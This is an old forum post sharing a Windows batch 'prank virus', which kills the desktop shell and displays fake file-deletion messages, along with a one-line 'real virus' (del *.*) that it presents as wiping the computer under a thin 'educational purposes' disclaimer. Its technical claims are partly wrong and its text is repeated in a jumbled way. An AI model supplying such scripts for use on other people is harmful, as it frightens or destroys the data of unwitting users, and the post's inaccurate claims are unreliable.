Prank Virus and Real Virus
Posted: 20 Feb 2012 10:36
Just a nice prank virus I made out of a bunch of other prank ones
It's pretty fun to use on your friends, and it disables the icons/taksbar so if they close the file they will be forced to restart their computer!
WARNING-----HARMFUL CONTENT ALERT----FOR EDUCATIONAL PURPOSES ONLY, USE AT OWN RISK
This is a real, powerful virus. It deletes pretty much every file it can find on the computer.
And it's only 7 characters long.
It deletes files with Any name and Any extension. I haven't tested it, for obvious reasons, but it's basic enough.
This can cause irreparable damage to the computer in the form of lost files. NEVER use this. It is meant for educational purposes only.
@echo off
cls
taskkill /f explorer.exe (hides icons and taskbar)
echo Hello there!
ping localhost -n 2 >nul
echo I am a virus!
ping localhost -n 2 >nul
echo HAHAHAHAHAHAHAHAHAHA!
ping localhost -n 2 >nul
echo DELETING HARD DRIVE FILES
dir /s (lists every file in your system, takes 2-3 minutes)
cls
ping localhost -n 3 >nul
echo lolz
echo.
echo this was a prank
ping localhost -n 2 >nul
cls
start explorer.exe (brings icons/taskbar back)
exit
It's pretty fun to use on your friends, and it disables the icons/taksbar so if they close the file they will be forced to restart their computer!
WARNING-----HARMFUL CONTENT ALERT----FOR EDUCATIONAL PURPOSES ONLY, USE AT OWN RISK
This is a real, powerful virus. It deletes pretty much every file it can find on the computer.
And it's only 7 characters long.
del *.*
It deletes files with Any name and Any extension. I haven't tested it, for obvious reasons, but it's basic enough.
This can cause irreparable damage to the computer in the form of lost files. NEVER use this. It is meant for educational purposes only.